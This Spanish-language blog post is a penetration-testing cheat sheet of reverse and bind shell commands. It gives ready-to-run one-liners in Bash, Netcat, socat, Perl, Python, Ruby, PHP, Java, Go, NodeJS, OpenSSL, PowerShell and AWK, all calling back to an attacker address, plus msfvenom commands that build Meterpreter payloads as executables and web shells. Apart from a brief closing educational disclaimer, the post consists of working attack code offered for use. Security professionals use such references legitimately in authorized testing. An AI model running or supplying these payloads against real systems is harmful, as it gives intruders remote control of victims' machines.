Bienvenidos a un nuevo post en Byte Mind. En este caso vamos a dejar un listado de formas en las que obtener una reverse shell en la máquina víctima de nuestro test de penetración.
Dependiendo de la máquina objetivo podremos utilizar unas u otras en función de las herramientas o lenguajes instalados en la misma.
A continuación dejo la lista, espero que os sea de utilidad y recordad cambiar las direcciones y puertos por los correspondientes al objetivo actual.
Índice
Bash
1 2 3 4 5 6 7 8 9 10 |
# TCP # atacante nc -lvp 1234 # victima bash -i >& /dev/tcp/10.0.0.1/1234 0>&1 # UDP # atacante nc -u -lvp 1234 # victima sh -i >& /dev/udp/10.0.0.1/1234 0>&1 |
Netcat
1 2 3 4 5 6 7 8 9 10 11 12 13 |
# Reverse shell # atacante nc -lvp 1234 # victima nc -e /bin/sh 10.0.0.1 1234 # si la versión de netcat no soporta la opción -e utilizaremos el siguiente comando rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f # Bind shell # Una Bind shell se diferencia de la reverse en que la máquina víctima es quien escucha # atacante nc 10.10.10.2 1234 # victima nc -lvp 1234 -e /bin/sh |
Xterm
1 2 3 4 5 |
# atacante socat file:`tty`,raw,echo=0 TCP-L:1234 # victima /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234 |
Pueden descargar el binario statico de socat desde github en el siguiente enlace
Perl
1 2 3 4 |
# atacante nc -lvp 1234 # victima perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
Python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# atacante nc -lvp 1234 # victima # IPv4 export RHOST="10.0.0.1";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' # otra forma python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' # IPv6 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' # otra forma python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' # Sólo en windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 1234)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" |
Ruby
1 2 3 4 5 |
# atacante nc -lvp 1234 # victima ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
PHP
1 2 3 4 5 |
# atacante nc -lvp 1234 # victima php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' |
Java
1 2 3 4 5 6 7 |
# atacante nc -lvp 1234 # victima r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() |
Golang
1 2 3 4 5 |
# atacante nc -lvp 1234 # victima echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:1234");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go |
NodeJS
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
# atacante nc -lvp 1234 # victima (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(1234, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })(); # otra forma require('child_process').exec('nc -e /bin/sh 10.0.0.1 1234') # otra forma -var x = global.process.mainModule.require -x('child_process').exec('nc 10.0.0.1 1234 -e /bin/bash') |
OpenSSL
1 2 3 4 5 6 7 8 |
# atacante openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 # otra forma ncat --ssl -vv -l -p 1234 # victima mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:1234 > /tmp/s; rm /tmp/s |
PowerShell
1 2 3 4 5 6 7 |
# atacante nc -lvp 1234 # victima (varios ejemplos) powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() # otra forma powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
AWK
1 2 3 4 5 |
# atacante nc -lvp 4242 # victima awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null |
Meterpreter shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# En el framework Metasploit se incluye la herramienta MsfVenom que nos permite crear payloads en el lenguaje que necesitemos, algunos ejemplos: msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > reverse.exe msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf >reverse.elf msfvenom -p linux/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf >reverse.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf > shell.elf msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > shell.exe msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f macho > shell.macho msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f raw > shell.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f war > shell.war msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=1234 -f raw > shell.py msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=1234 -f raw > shell.sh msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=1234 -f raw > shell.pl msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=1234 -f raw > shell.py |
Como siempre decimos, sólo mostramos esta información con fines educativos y para la realización de pentest de forma legal. No nos hacemos responsables de cualquier acción no debida con la ayuda de la misma.
Esto ha sido todo por el momento, espero les sea de utilidad y ya saben, cualquier duda o comentario, estamos a su disposición.